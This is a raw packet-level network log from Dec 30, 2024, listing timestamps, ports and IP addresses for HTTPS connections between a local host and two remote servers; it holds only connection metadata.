Dec 30, 2024 19:15:15.251640081 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.251933098 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.251952887 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.251992941 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.251998901 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.252038956 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.252057076 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.252243996 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.252260923 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.252334118 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.252338886 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.252551079 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.290261984 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.290277958 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.290339947 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.290363073 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.290374994 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.290394068 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.290545940 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.290559053 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.290606022 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.290611982 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.290664911 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.300654888 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.300669909 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.300724030 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.300738096 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.300791025 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.341002941 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.341023922 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.341067076 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.341073990 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.341115952 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.341121912 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.397651911 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.397667885 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.397717953 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.397732973 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.397767067 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.398092031 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.398107052 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.398138046 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.398144960 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.398161888 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.398195028 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.398397923 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.398411036 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.398457050 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.398463011 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.398514986 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.398828030 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.398844957 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.398885012 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.398890972 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.398962975 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.404558897 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.404575109 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.404616117 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.404627085 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.404650927 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.404663086 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.405020952 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.405035019 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.405086994 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.405093908 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.405129910 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.405313015 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.405354977 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.405371904 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.405376911 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.405396938 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.405410051 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.406847954 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.406862020 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.406903982 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.406912088 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.406954050 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.486079931 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.486104012 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.486149073 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.486166954 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.486192942 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.486212015 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.486505032 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.486520052 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.486577988 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.486583948 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.486721992 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.487081051 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.487096071 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.487145901 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.487153053 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.487205029 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.487205029 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.487421036 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.487435102 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.487487078 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.487493992 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.487555027 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.493156910 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.493174076 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.493241072 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.493253946 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.493288040 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.493525982 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.493539095 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.493572950 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.493577957 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.493603945 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.493624926 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.493938923 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.493952990 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.493999004 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.494004965 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.494097948 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.495354891 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.495378017 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.495409012 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.495418072 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.495438099 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.495460033 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.574676037 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.574695110 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.574749947 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.574769020 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.574881077 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.575047970 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.575062990 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.575094938 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.575099945 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.575124979 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.575140953 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.575593948 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.575608015 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.575664043 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.575670958 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.575756073 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.575927973 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.575943947 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.575989008 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.575994968 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.576024055 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.576042891 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.581988096 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.582003117 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.582035065 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.582052946 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.582062960 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.582093000 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.582107067 CET	443	49709	172.67.154.95	192.168.2.5
Dec 30, 2024 19:15:15.582120895 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.582145929 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:15:15.584728956 CET	49709	443	192.168.2.5	172.67.154.95
Dec 30, 2024 19:16:27.327341080 CET	49982	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:27.327383995 CET	443	49982	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:27.327480078 CET	49982	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:27.328468084 CET	49982	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:27.328480005 CET	443	49982	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:27.797769070 CET	443	49982	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:27.797832966 CET	49982	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:27.800380945 CET	49982	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:27.800390005 CET	443	49982	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:27.800621033 CET	443	49982	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:27.846281052 CET	49982	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:27.854413986 CET	49982	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:27.854425907 CET	49982	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:27.854480028 CET	443	49982	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:28.296942949 CET	443	49982	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:28.297079086 CET	443	49982	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:28.297127962 CET	49982	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:28.298980951 CET	49982	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:28.298994064 CET	443	49982	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:28.299005985 CET	49982	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:28.299010992 CET	443	49982	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:28.307018995 CET	49983	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:28.307048082 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:28.307116032 CET	49983	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:28.308151007 CET	49983	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:28.308165073 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:28.872407913 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:28.872471094 CET	49983	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:28.873840094 CET	49983	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:28.873846054 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:28.874178886 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:28.875300884 CET	49983	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:28.875324965 CET	49983	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:28.875403881 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.323745012 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.323795080 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.323827982 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.323858976 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.323859930 CET	49983	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:29.323884964 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.323911905 CET	49983	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:29.323931932 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.323964119 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.323975086 CET	49983	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:29.323982000 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.324017048 CET	49983	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:29.324459076 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.324518919 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.324552059 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.324567080 CET	49983	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:29.324573994 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.324611902 CET	49983	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:29.411240101 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.411300898 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.411338091 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.411354065 CET	49983	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:29.411365032 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.411403894 CET	49983	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:29.411410093 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.411439896 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.411483049 CET	49983	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:29.547930002 CET	49983	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:29.547945023 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:29.547954082 CET	49983	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:29.547959089 CET	443	49983	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:30.146704912 CET	49984	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:30.146729946 CET	443	49984	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:30.146796942 CET	49984	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:30.147083998 CET	49984	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:30.147097111 CET	443	49984	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:30.625401974 CET	443	49984	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:30.625473022 CET	49984	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:30.627422094 CET	49984	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:30.627430916 CET	443	49984	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:30.627674103 CET	443	49984	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:30.630922079 CET	49984	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:30.631201982 CET	49984	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:30.631231070 CET	443	49984	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:31.116183043 CET	443	49984	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:31.116283894 CET	443	49984	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:31.116359949 CET	49984	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:31.116523027 CET	49984	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:31.116538048 CET	443	49984	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:31.131925106 CET	49985	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:31.131975889 CET	443	49985	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:31.132071018 CET	49985	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:31.132323980 CET	49985	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:31.132337093 CET	443	49985	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:31.592806101 CET	443	49985	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:31.592885971 CET	49985	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:31.594028950 CET	49985	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:31.594038010 CET	443	49985	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:31.594266891 CET	443	49985	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:31.595505953 CET	49985	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:31.595621109 CET	49985	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:31.595647097 CET	443	49985	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:31.595716000 CET	49985	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:31.595721960 CET	443	49985	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:32.114799976 CET	443	49985	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:32.114897013 CET	443	49985	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:32.114945889 CET	49985	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:32.119626045 CET	49985	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:32.119642019 CET	443	49985	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:32.232929945 CET	49986	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:32.232949972 CET	443	49986	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:32.233019114 CET	49986	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:32.237310886 CET	49986	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:32.237323999 CET	443	49986	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:32.693453074 CET	443	49986	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:32.693630934 CET	49986	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:32.793518066 CET	49986	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:32.793533087 CET	443	49986	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:32.793860912 CET	443	49986	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:32.795551062 CET	49986	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:32.795737982 CET	49986	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:32.795768023 CET	443	49986	188.114.96.3	192.168.2.5
Dec 30, 2024 19:16:32.795825005 CET	49986	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:16:32.795835018 CET	443	49986	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:41.677123070 CET	443	49986	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:41.677229881 CET	443	49986	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:41.677304983 CET	49986	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:41.696727991 CET	49986	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:41.696779966 CET	443	49986	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:42.020734072 CET	49987	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:42.020771027 CET	443	49987	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:42.020843983 CET	49987	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:42.021121979 CET	49987	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:42.021132946 CET	443	49987	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:42.486534119 CET	443	49987	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:42.486710072 CET	49987	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:42.488019943 CET	49987	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:42.488027096 CET	443	49987	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:42.488261938 CET	443	49987	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:42.489460945 CET	49987	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:42.489562988 CET	49987	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:42.489567995 CET	443	49987	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.124247074 CET	443	49987	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.124351978 CET	443	49987	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.124408007 CET	49987	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.124480009 CET	49987	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.124494076 CET	443	49987	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.385546923 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.385601997 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.385675907 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.385948896 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.385962963 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.846318007 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.846431971 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.847945929 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.847959995 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.848201990 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.850547075 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.851238012 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.851279020 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.851383924 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.851416111 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.851524115 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.851563931 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.851660967 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.851695061 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.851795912 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.851825953 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.851943016 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.851972103 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.851980925 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.852102995 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.852134943 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.860610008 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.860784054 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.860827923 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.860836983 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.860861063 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.860872030 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.860958099 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.861001015 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.861028910 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.864763975 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:50.864873886 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:50.864907026 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:52.885720015 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:52.885833025 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:52.885911942 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:52.886048079 CET	49988	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:52.886068106 CET	443	49988	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:52.890142918 CET	49989	443	192.168.2.5	188.114.96.3
Dec 30, 2024 19:17:52.890187979 CET	443	49989	188.114.96.3	192.168.2.5
Dec 30, 2024 19:17:52.890280008 CET	49989	443	192.168.2.5	188.114.96.3
